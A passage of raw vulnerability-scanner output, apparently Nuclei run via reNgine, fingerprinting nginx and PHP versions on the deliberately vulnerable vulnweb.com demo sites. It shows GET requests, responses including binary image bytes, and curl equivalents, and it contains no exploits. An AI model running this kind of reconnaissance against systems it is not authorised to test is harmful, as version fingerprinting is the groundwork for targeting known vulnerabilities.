PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:52.631070154Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.1788.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4688.4 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:52 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:52.639712126Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4688.4 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:64.0) Gecko/20100101 Firefox/64.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:52 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:52.640245442Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:64.0) Gecko/20100101 Firefox/64.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Ddg/17.3\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:52 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:52.64285763Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Ddg/17.3' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"php\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:52 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:52.643510883Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:52 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:52.644902967Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/logout\",\"path\":\"/logout\",\"matched-at\":\"http://testhtml5.vulnweb.com/logout\",\"request\":\"GET /logout HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 302 FOUND\\r\\nConnection: close\\r\\nContent-Length: 265\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nLocation: http://testhtml5.vulnweb.com/\\r\\nServer: nginx/1.19.0\\r\\nSet-Cookie: username=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Path=/\\r\\n\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:53.222403608Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' 'http://testhtml5.vulnweb.com/logout'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"path\":\"/pictures/2.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET /pictures/2.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.82\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1353\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:34:53 GMT\\r\\nEtag: \\\"4dca64a1-549\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001a\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0001\\u0003\\u0004\\u0005\\u0006\\ufffd\\ufffd\\u0000+\\u0010\\u0000\\u0002\\u0002\\u0001\\u0004\\u0002\\u0002\\u0000\\u0004\\u0007\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0011\\u0003\\u0004\\u0012!1AQ\\\"a\\u00142q\\ufffd\\u0005\\u0013$B\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0003\\u0001\\u0002\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000'\\u0011\\u0000\\u0002\\u0002\\u0001\\u0004\\u0002\\u0002\\u0001\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0011\\u0003\\u0004\\u0012!1\\u0005Q\\u00132A\\\"#3aq\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffd\\ufffdd\\ufffdH䏺JU\\ufffd\\t\\u000f\\u0008\\ufffdi{\\u0015+f\\ufffd.7\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB6\\ufffd˨\\ufffd\\ufffd\\ufffd\\ufffd͒\\u001bdס\\u001a\\ufffdi\\ufffdE\\ufffdn\\ufffd_\\ufffd\\ufffd%\\u001atN\\u000c\\ufffdpR\\ufffdH\\u001d\\ufffd,֝\\ufffd\\u0000\\u0001 \\u0014\\u0000@'DQ\\u0003\\u0000Qu?b\\ufffd-\\u0010\\u0005\\ufffdL\\u0000\\u0000\\t\\u0000\\u0000\\u0000-\\u0005\\ufffd\\u0001\\ufffd\\ufffd\\u000cH\\ufffd'A\\u0015F\\ufffd\\u001a\\ufffdʔ?z3G\\ufffd^\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffdK\\ufffd)\\ufffdۓ\\ufffdl\\ufffd%\\ufffd\\ufffd\\\"䨤\\ufffd\\u001f\\ufffdu\\u0015Ed44\\ufffd2\\u0005\\ufffdS\\ufffdD\\u0002Y\\u0005F\\ufffd`\\u0000\\u0000H\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\r\\u0011L`\\\"\\ufffd)4(\\u000cF\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0003%C\\ufffd9\\ufffd\\ufffd1F\\ufffd$\\ufffdc$\\ufffd\\ufffd\\u000f\\ufffd~\\ufffdQ_\\ufffdק{c'K\\ufffd#\\ufffd\\ufffdr|\\ufffdR\\ufffd\\ufffd(\\ufffdԤ\\ufffdI}#;\\ufffd\\ufffdk\\ufffdʚ\\ufffd\\ufffdϳf\\ufffd\\ufffd\\ufffdEmZ\\u0010\\ufffd\\ufffd\\u0012Kȶ\\ufffdА\\ufffd\\ufffdC\\u0001Z\\u001a\\ufffdB\\u0000\\ufffd\\u0006Ҵ1I\\n\\u0004\\ufffd\\u0000X\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\ufffd\\u001com\\ufffd\\u0004\\ufffd,\\ufffd7\\u000e\\ufffd}\\ufffd\\\\1\\ufffd,\\ufffd\\u001f\\u0017\\ufffd\\ufffd#\\ufffdwG\\ufffdϫ\\ufffd\\u0016\\ufffd\\ufffd\\ufffddPf\\ufffd\\u003c\\u0013\\ufffdK\\ufffd\\ufffdG\\ufffd4j\\ufffd\\ufffd\\u001c\\ufffdi\\ufffd$\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\ufffdj\\ufffd4C\\u000b\\ufffd\\ufffd\\ufffdg\\ufffd8\\ufffd`\\ufffd.\\ufffdΜy)\\ufffdN\\ufffd\\ufffd?\\ufffd\\ufffdj\\ufffd\\ufffd\\u001a\\ufffd*\\ufffdw\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd),\\u0012\\ufffd5b\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffdg%\\ufffd\\ufffd[7e\\ufffdb\\ufffd\\u001a\\ufffd\\u0000/\\ufffd$\\ufffdfiƎ֛3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdХ\\ufffd5b\\ufffdޥ\\ufffd@%Ţ\\u0008\\u0019v\\u0000\\u0000\\u0000\\u0014E\\u0012\\u0000M\\ufffd(\\ufffd\\u0018\\u0008\\ufffdw1h\\ufffd\\ufffd(\\ufffd\\ufffd\\ufffd\\u001e\\u001a7\\ufffd\\ufffdC\\u001c\\ufffd\\ufffd\\ufffd_\\ufffd\\u000c{,\\ufffd\\ufffdَ[]\\ufffd\\ufffdkp\\ufffd\\ufffdp}\\u001d?ĹI\\ufffd\\ufffd'\\ufffd\\u0026\\ufffdjq\\ufffd\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffd\\ufffdWO\\ufffd\\ufffd\\ufffd\\ufffdkV\\ufffd\\ufffd\\ufffd}\\u001bq\\ufffd|\\ufffdc]\\ufffdq5\\u0018\\ufffd\\ufffdp\\u0013\\ufffdJ\\ufffd\\u00003\\ufffd\\ufffd]Fhe\\ufffd\\u0018\\ufffd\\ufffdK\\ufffd4\\ufffd%r}\\ufffd\\ufffdW\\ufffd\\ufffdà\\ufffd\\ufffdd\\ufffdh\\ufffd}\\ufffd\\ufffd-\\ufffd\\\\\\ufffd\\ufffd\\u001c\\ufffdE\\ufffd\\ufffd+B\\ufffd+^\\ufffd4j\\ufffd\\ufffd\\u0004\\u0010\\ufffd}\\ufffd\\u0004\\u000cN\\ufffdqb\\ufffd\\u0000Qe?e`6\\ufffd\\u001b~Ȣې\\ufffd6߲v\\ufffd\\ufffd܄\\u0026\\ufffd\\ufffd\\u0014C\\ufffd\\ufffdJ\\ufffdx\\ufffd\\n\\u003enjlԑ\\ufffd\\ufffd5CEY\\ufffd3\\ufffd\\ufffdj=\\ufffd\\nʱ\\ufffd\\ufffdեj\\ufffdб\\ufffd\\u0000N\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffdp\\ufffd\\ufffd\\ufffdk3\\ufffd\\ufffdҾ\\ufffd9\\ufffd\\ufffd\\ufffd}3t\\ufffd\\ufffd\\ufffdψ\\ufffd2J4\\ufffdN\\rvt\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u003e\\ufffdq\\ufffd%\\ufffd\\ufffd\\t\\ufffd\\ufffd\\u001fB\\ufffd\\ufffde\\ufffd\\u001bJ\\ufffd\\u001e\\ufffdQM\\\"(\\ufffd»^,]\\ufffde\\\\FG2k\\ufffdWAC\\ufffd\\r\\ufffd\\ufffd.\\ufffdbPQf\\ufffd\\ufffd\\ufffdt[^\\tP\\ufffd\\ufffdΣ\\ufffd(\\ufffd\\ufffd\\ufffd\\u00126\\ufffd6\\ufffdYlJ\\u0026\\ufffd\\ufffd\\ufffdI\\u0013D\\u003c\\ufffd\\ufffd\\ufffdd\\u0017 \\u0006\\ufffd\\ufffdp2\\ufffd\\u000e\\ufffd\\ufffdm%\\u000e6\\ufffd\\ufffd\\ufffduc\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd}\\ufffd\\ufffd\\u0000\\u001dl*⏝y\\ufffdJ\\u0019\\ufffdK\\ufffdNn\\ufffdN\\u0012x\\ufffd䋤rr%`\\u0006-W\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd\\ufffdEd(\\ufffd\\u0003!\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdP\\ufffd8\\ufffd\\ufffdk\\ufffd\\ufffd\\u0005)\\ufffd?,\\u0000+\\ufffd\\ufffd\\ufffd;5\\u0012\\ufffd\\u000c2\\ufffd\\ufffd\\ufffd+\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\u0000e\\ufffd2\\ufffd\\t7\\ufffd6-\\\"v\\ufffd\\u0001f\\ufffdd\\ufffd\\u0026ͺXA\\ufffd\\ufffd\\ufffdSh\\u0000~\\ufffd\\\\\\ufffdW\\ufffd\\ufffd\\ufffd%O\\ufffd\\ufffdr\\ufffd\\ufffdc\\u0014\\ufffd\\u0004\\u003eΌ\\u001b\\ufffdCHe\\u0014\\u0000\\u0008\\ufffd\\ufffd\\u0007\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:53.547016335Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.82' 'http://testphp.vulnweb.com/pictures/2.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"path\":\"/pictures/3.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET /pictures/3.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3725\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:34:53 GMT\\r\\nEtag: \\\"4dca64a1-e8d\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0004\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0005\\u0006\\u0007\\u0008\\ufffd\\ufffd\\u00002\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0003\\u0003\\u0003\\u0003\\u0003\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!\\u00061A\\u0013\\\"Q\\u00142a\\u0007q\\ufffd\\u0015B\\ufffd\\u0008\\u0016#3C\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u